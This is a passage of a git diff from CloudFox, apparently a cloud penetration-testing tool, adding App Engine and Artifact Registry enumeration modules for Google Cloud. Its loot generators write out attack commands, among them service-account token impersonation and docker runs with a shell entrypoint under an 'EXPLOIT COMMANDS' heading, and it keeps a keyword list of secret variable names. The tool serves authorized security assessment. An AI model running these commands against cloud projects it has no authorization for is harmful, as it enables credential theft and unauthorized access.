service account: +gcloud auth print-access-token --impersonate-service-account=%s + +`, + projectID, projectID, projectID, projectID, projectID, projectID, projectID, + serviceAccount, + projectID, projectID, projectID, projectID, + defaultHostname, serviceAccount, + ) +} + +func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { + secretPatterns := []string{ + "PASSWORD", "SECRET", "API_KEY", "TOKEN", "PRIVATE_KEY", + "DATABASE_URL", "DB_PASSWORD", "MYSQL_PASSWORD", "POSTGRES_PASSWORD", + "MONGODB_URI", "AWS_SECRET", "ENCRYPTION_KEY", "JWT_SECRET", "SESSION_SECRET", + } + + secretCount := 0 + + for name := range envVars { + nameUpper := strings.ToUpper(name) + for _, pattern := range secretPatterns { + if strings.Contains(nameUpper, pattern) { + secretCount++ + m.mu.Lock() + m.secretsFound++ + + if lootFile := m.LootMap[projectID]["appengine-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Potential secret in env var: %s (service: %s, version: %s)\n"+ + "# Recommendation: Migrate to Secret Manager\n"+ + "gcloud app versions describe %s --service=%s --project=%s\n\n", + name, serviceID, versionID, + versionID, serviceID, projectID, + ) + } + m.mu.Unlock() + break + } + } + } + + return secretCount +} + +func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { + deprecatedRuntimes := []string{ + "python27", "go111", "go112", "go113", "java8", "java11", + "nodejs10", "nodejs12", "php55", "php72", "ruby25", + } + + for _, deprecated := range deprecatedRuntimes { + if runtime == deprecated { + return true + } + } + return false +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getAllVersions returns all versions from all projects +func (m *AppEngineModule) getAllVersions() []AppEngineVersion { + var all []AppEngineVersion + for _, versions := range m.ProjectVersions { + all = append(all, versions...) + } + return all +} + +// getAllApps returns all apps from all projects +func (m *AppEngineModule) getAllApps() []AppEngineApp { + var all []AppEngineApp + for _, apps := range m.ProjectApps { + all = append(all, apps...) + } + return all +} + +// getAllFirewallRules returns all firewall rules from all projects +func (m *AppEngineModule) getAllFirewallRules() []AppEngineFirewallRule { + var all []AppEngineFirewallRule + for _, rules := range m.ProjectFirewallRules { + all = append(all, rules...) + } + return all +} + +// getTableHeader returns the main appengine table header +func (m *AppEngineModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "App ID", + "Location", + "Status", + "Hostname", + "Service", + "Version", + "Runtime", + "Environment", + "Ingress", + "Public", + "Service Account", + "SA Attack Paths", + "Default SA", + "Deprecated", + "Env Vars", + "Secrets", + "VPC Connector", + "URL", + } +} + +// buildTablesForProject builds tables for given project data +func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngineApp, versions []AppEngineVersion, firewallRules []AppEngineFirewallRule) []internal.TableFile { + var tables []internal.TableFile + header := m.getTableHeader() + var body [][]string + + if len(versions) > 0 { + for _, ver := range versions { + var app AppEngineApp + for _, a := range apps { + if a.ProjectID == ver.ProjectID { + app = a + break + } + } + + publicStr := "No" + if ver.Public { + publicStr = "Yes" + } + + defaultSAStr := "No" + if ver.DefaultSA { + defaultSAStr = "Yes" + } + + deprecatedStr := "No" + if ver.DeprecatedRuntime { + deprecatedStr = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if ver.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, ver.ServiceAccount) + } else { + attackPaths = "No" + } + } + + body = append(body, []string{ + ver.ProjectID, + m.GetProjectName(ver.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + ver.ServiceID, + ver.ID, + ver.Runtime, + ver.Environment, + ver.IngressSettings, + publicStr, + ver.ServiceAccount, + attackPaths, + defaultSAStr, + deprecatedStr, + fmt.Sprintf("%d", ver.EnvVarCount), + fmt.Sprintf("%d", ver.SecretEnvVars), + ver.VPCConnector, + ver.URL, + }) + + // Add public services to loot + if ver.Public && m.LootMap[projectID] != nil { + if lootFile := m.LootMap[projectID]["appengine-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Public App Engine service: %s/%s\n"+ + "curl %s\n\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } + } + } + } else { + for _, app := range apps { + body = append(body, []string{ + app.ProjectID, + m.GetProjectName(app.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + "No services deployed", // Service + "-", // Version + "-", // Runtime + "-", // Environment + "-", // Ingress + "-", // Public + app.ServiceAccount, // Service Account + "-", // SA Attack Paths + "-", // Default SA + "-", // Deprecated + "-", // Env Vars + "-", // Secrets + "-", // VPC Connector + "-", // URL + }) + } + } + + tables = append(tables, internal.TableFile{ + Name: "appengine", + Header: header, + Body: body, + }) + + // Firewall rules table + if len(firewallRules) > 0 { + var fwBody [][]string + for _, rule := range firewallRules { + fwBody = append(fwBody, []string{ + rule.ProjectID, + m.GetProjectName(rule.ProjectID), + fmt.Sprintf("%d", rule.Priority), + rule.Action, + rule.SourceRange, + rule.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "appengine-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Priority", + "Action", + "Source Range", + "Description", + }, + Body: fwBody, + }) + } + + return tables +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *AppEngineModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectApps { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + apps := m.ProjectApps[projectID] + versions := m.ProjectVersions[projectID] + firewallRules := m.ProjectFirewallRules[projectID] + + tables := m.buildTablesForProject(projectID, apps, versions, firewallRules) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = AppEngineOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *AppEngineModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allApps := m.getAllApps() + allVersions := m.getAllVersions() + allFirewallRules := m.getAllFirewallRules() + + // Use empty projectID since we're building for all projects + tables := m.buildTablesForProject("", allApps, allVersions, allFirewallRules) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := AppEngineOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 3214fc43..844b19d4 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -1,10 +1,14 @@ package commands import ( + "context" "fmt" + "strings" + "sync" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" ArtifactRegistryService "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -12,161 +16,573 @@ import ( var GCPArtifactRegistryCommand = &cobra.Command{ Use: globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP artifact registry information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available artifact registry resource information: -cloudfox gcp artfact-registry`, + Aliases: []string{"ar", "artifacts", "gcr"}, + Short: "Enumerate GCP Artifact Registry and Container Registry with security configuration", + Long: `Enumerate GCP Artifact Registry and legacy Container Registry (gcr.io) with security-relevant details. + +Features: +- Lists all Artifact Registry repositories with security configuration +- Shows Docker images and package artifacts with tags and digests +- Enumerates IAM policies per repository and identifies public repositories +- Shows encryption type (Google-managed vs CMEK) +- Shows repository mode (standard, virtual, remote) +- Generates gcloud commands for artifact enumeration +- Generates exploitation commands for artifact access +- Enumerates legacy Container Registry (gcr.io) locations + +Security Columns: +- Public: Whether the repository has allUsers or allAuthenticatedUsers access +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Mode: STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, or REMOTE_REPOSITORY +- RegistryType: "artifact-registry" or "container-registry" (legacy gcr.io)`, Run: runGCPArtifactRegistryCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ArtifactRegistryModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPArtifactRegistryResults struct { - ArtifactData []ArtifactRegistryService.ArtifactInfo - RepositoryData []ArtifactRegistryService.RepositoryInfo + // Module-specific fields + ProjectArtifacts map[string][]ArtifactRegistryService.ArtifactInfo // projectID -> artifacts + ProjectRepositories map[string][]ArtifactRegistryService.RepositoryInfo // projectID -> repos + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + client *artifactregistry.Client + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPArtifactRegistryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type ArtifactRegistryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - repoHeader := []string{ - "Name", - "Format", - "Description", - "Size", - "Location", - "ProjectID", - } - - var repoBody [][]string - - for _, value := range g.RepositoryData { - repoBody = append( - repoBody, - []string{ - value.Name, - value.Format, - value.Description, - value.SizeBytes, - value.Location, - value.ProjectID, - }, +func (o ArtifactRegistryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ArtifactRegistryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create Artifact Registry client + client, err := artifactregistry.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Artifact Registry client: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + defer client.Close() + + // Create module instance + module := &ArtifactRegistryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectArtifacts: make(map[string][]ArtifactRegistryService.ArtifactInfo), + ProjectRepositories: make(map[string][]ArtifactRegistryService.RepositoryInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + client: client, + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ArtifactRegistryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, m.processProject) + + allRepos := m.getAllRepositories() + allArtifacts := m.getAllArtifacts() + + // Check results + if len(allRepos) == 0 && len(allArtifacts) == 0 { + logger.InfoM("No artifact registries found", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(allRepos), len(allArtifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllRepositories returns all repositories from all projects +func (m *ArtifactRegistryModule) getAllRepositories() []ArtifactRegistryService.RepositoryInfo { + var all []ArtifactRegistryService.RepositoryInfo + for _, repos := range m.ProjectRepositories { + all = append(all, repos...) + } + return all +} + +// getAllArtifacts returns all artifacts from all projects +func (m *ArtifactRegistryModule) getAllArtifacts() []ArtifactRegistryService.ArtifactInfo { + var all []ArtifactRegistryService.ArtifactInfo + for _, artifacts := range m.ProjectArtifacts { + all = append(all, artifacts...) + } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating artifact registries in project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + // Create service and fetch data + ars := ArtifactRegistryService.New(m.client) + result, err := ars.RepositoriesAndArtifacts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Could not enumerate artifact registries in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectRepositories[projectID] = result.Repositories + m.ProjectArtifacts[projectID] = result.Artifacts + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["artifact-registry-commands"] = &internal.LootFile{ + Name: "artifact-registry-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + // Generate loot for each repository and artifact + for _, repo := range result.Repositories { + m.addRepositoryToLoot(projectID, repo) + } + for _, artifact := range result.Artifacts { + m.addArtifactToLoot(projectID, artifact) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) and %d artifact(s) in project %s", len(result.Repositories), len(result.Artifacts), projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ArtifactRegistryModule) addRepositoryToLoot(projectID string, repo ArtifactRegistryService.RepositoryInfo) { + lootFile := m.LootMap[projectID]["artifact-registry-commands"] + if lootFile == nil { + return + } + + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } + + // Handle legacy Container Registry differently + if repo.RegistryType == "container-registry" { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# LEGACY CONTAINER REGISTRY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Note: Consider migrating to Artifact Registry\n"+ + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s\n"+ + "# List images:\n"+ + "gcloud container images list --repository=%s/%s\n"+ + "# Check for public access (via storage bucket):\n"+ + "gsutil iam get gs://artifacts.%s.appspot.com\n\n", + repo.Name, repo.ProjectID, + strings.Split(repo.Name, "/")[0], // gcr.io hostname + strings.Split(repo.Name, "/")[0], repo.ProjectID, + repo.ProjectID, ) + return } - repoTableFile := internal.TableFile{ - Header: repoHeader, - Body: repoBody, - Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Repository header and enumeration commands + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# REPOSITORY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe repository:\n"+ + "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud artifacts repositories get-iam-policy %s --project=%s --location=%s\n", + repoName, repo.ProjectID, repo.Location, + repo.Format, repo.Mode, repo.EncryptionType, repo.PublicAccess, + repoName, repo.ProjectID, repo.Location, + repoName, repo.ProjectID, repo.Location, + ) + + // Docker-specific commands + if repo.Format == "DOCKER" { + lootFile.Contents += fmt.Sprintf( + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s-docker.pkg.dev\n"+ + "# List images:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n"+ + "# List vulnerabilities:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n", + repo.Location, + repo.Location, repo.ProjectID, repoName, + repo.Location, repo.ProjectID, repoName, + ) } - tableFiles = append(tableFiles, repoTableFile) + lootFile.Contents += "\n" +} + +func (m *ArtifactRegistryModule) addArtifactToLoot(projectID string, artifact ArtifactRegistryService.ArtifactInfo) { + lootFile := m.LootMap[projectID]["artifact-registry-commands"] + if lootFile == nil { + return + } - artifactHeader := []string{ + // Exploitation commands for Docker images + if artifact.Format == "DOCKER" { + imageBase := fmt.Sprintf("%s-docker.pkg.dev/%s/%s/%s", + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# DOCKER IMAGE: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Repository: %s, Location: %s\n"+ + "# Digest: %s\n", + artifact.Name, + artifact.ProjectID, + artifact.Repository, artifact.Location, + artifact.Digest, + ) + + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + // Generate commands for each tag + if len(artifact.Tags) > 0 { + for _, tag := range artifact.Tags { + lootFile.Contents += fmt.Sprintf( + "# Tag: %s\n"+ + "docker pull %s:%s\n"+ + "docker inspect %s:%s\n"+ + "docker run -it --entrypoint /bin/sh %s:%s\n\n", + tag, + imageBase, tag, + imageBase, tag, + imageBase, tag, + ) + } + } else { + // No tags, use digest + lootFile.Contents += fmt.Sprintf( + "# No tags - use digest\n"+ + "docker pull %s@%s\n"+ + "docker inspect %s@%s\n"+ + "docker run -it --entrypoint /bin/sh %s@%s\n\n", + imageBase, artifact.Digest, + imageBase, artifact.Digest, + imageBase, artifact.Digest, + ) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Count public repos for finding message + publicCount := 0 + for _, repos := range m.ProjectRepositories { + for _, repo := range repos { + if repo.IsPublic { + publicCount++ + } + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getRepoHeader returns the header for repository table +func (m *ArtifactRegistryModule) getRepoHeader() []string { + return []string{ + "Project", "Name", "Format", - "Version", "Location", + "Mode", + "Public", + "Encryption", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + } +} + +// getArtifactHeader returns the header for artifact table +func (m *ArtifactRegistryModule) getArtifactHeader() []string { + return []string{ + "Project", + "Name", "Repository", + "Location", + "Tags", + "Digest", "Size", - "Updated", - "ProjectID", - } - - var artifactBody [][]string - - for _, value := range g.ArtifactData { - artifactBody = append( - artifactBody, - []string{ - value.Name, - value.Format, - value.Version, - value.Location, - value.Repository, - value.SizeBytes, - value.Updated, - value.ProjectID, - }, - ) + "Uploaded", } +} + +// reposToTableBody converts repositories to table body rows +func (m *ArtifactRegistryModule) reposToTableBody(repos []ArtifactRegistryService.RepositoryInfo) [][]string { + var body [][]string + for _, repo := range repos { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } - artifactTableFile := internal.TableFile{ - Header: artifactHeader, - Body: artifactBody, - Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Format public access display + publicDisplay := "" + if repo.IsPublic { + publicDisplay = repo.PublicAccess + } + + // Shorten mode for display + mode := repo.Mode + mode = strings.TrimPrefix(mode, "REPOSITORY_MODE_") + mode = strings.TrimSuffix(mode, "_REPOSITORY") + + // One row per IAM member + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + for _, member := range binding.Members { + memberType := ArtifactRegistryService.GetMemberType(member) + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Repository with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + "-", + "-", + "-", + }) + } } + return body +} - tableFiles = append(tableFiles, artifactTableFile) +// artifactsToTableBody converts artifacts to table body rows +func (m *ArtifactRegistryModule) artifactsToTableBody(artifacts []ArtifactRegistryService.ArtifactInfo) [][]string { + var body [][]string + for _, artifact := range artifacts { + // Format tags + tags := "-" + if len(artifact.Tags) > 0 { + if len(artifact.Tags) <= 3 { + tags = strings.Join(artifact.Tags, ", ") + } else { + tags = fmt.Sprintf("%s (+%d more)", strings.Join(artifact.Tags[:3], ", "), len(artifact.Tags)-3) + } + } - return tableFiles + body = append(body, []string{ + m.GetProjectName(artifact.ProjectID), + artifact.Name, + artifact.Repository, + artifact.Location, + tags, + artifact.Digest, + artifact.SizeBytes, + artifact.Uploaded, + }) + } + return body } -// Decide what is loot based on resource information -func (g GCPArtifactRegistryResults) LootFiles() []internal.LootFile { - // TODO consider a loot file of the URLs to the all docker image artifacts. Maybe sample commands to pull the images - return []internal.LootFile{} +// buildTablesForProject builds table files for a project +func (m *ArtifactRegistryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if repos, ok := m.ProjectRepositories[projectID]; ok && len(repos) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getRepoHeader(), + Body: m.reposToTableBody(repos), + }) + } + + if artifacts, ok := m.ProjectArtifacts[projectID]; ok && len(artifacts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getArtifactHeader(), + Body: m.artifactsToTableBody(artifacts), + }) + } + + return tableFiles } -// Houses high-level logic that retrieves resources and writes to output -func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) +// writeHierarchicalOutput writes output to per-project directories +func (m *ArtifactRegistryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + for projectID := range m.ProjectRepositories { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ArtifactRegistryOutput{Table: tableFiles, Loot: lootFiles} + } + + // Also add projects that only have artifacts + for projectID := range m.ProjectArtifacts { + if _, exists := outputData.ProjectLevelData[projectID]; !exists { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ArtifactRegistryOutput{Table: tableFiles, Loot: lootFiles} + } } - client, err := artifactregistry.NewClient(ctx) + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } - defer client.Close() +} - // Get the artifact repositories and artifacts using the projectIDs and ArtifactRegistryService - ars := ArtifactRegistryService.New(client) - var artifactResults []ArtifactRegistryService.ArtifactInfo - var repoRestuls []ArtifactRegistryService.RepositoryInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all artifact repositories and supported artifacts in all locations from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - result, err := ars.RepositoriesAndArtifacts(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return - } +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ArtifactRegistryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allRepos := m.getAllRepositories() + allArtifacts := m.getAllArtifacts() + + // Build table files + tableFiles := []internal.TableFile{{ + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getRepoHeader(), + Body: m.reposToTableBody(allRepos), + }} - artifactResults = append(artifactResults, result.Artifacts...) - repoRestuls = append(repoRestuls, result.Repositories...) - logger.InfoM(fmt.Sprintf("Done retrieving artifact repository resource data from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - cloudfoxOutput := GCPArtifactRegistryResults{ArtifactData: artifactResults, RepositoryData: repoRestuls} + if len(allArtifacts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getArtifactHeader(), + Body: m.artifactsToTableBody(allArtifacts), + }) + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + output := ArtifactRegistryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go new file mode 100644 index 00000000..849cc991 --- /dev/null +++ b/gcp/commands/assetinventory.go @@ -0,0 +1,861 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + asset "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/asset/apiv1/assetpb" 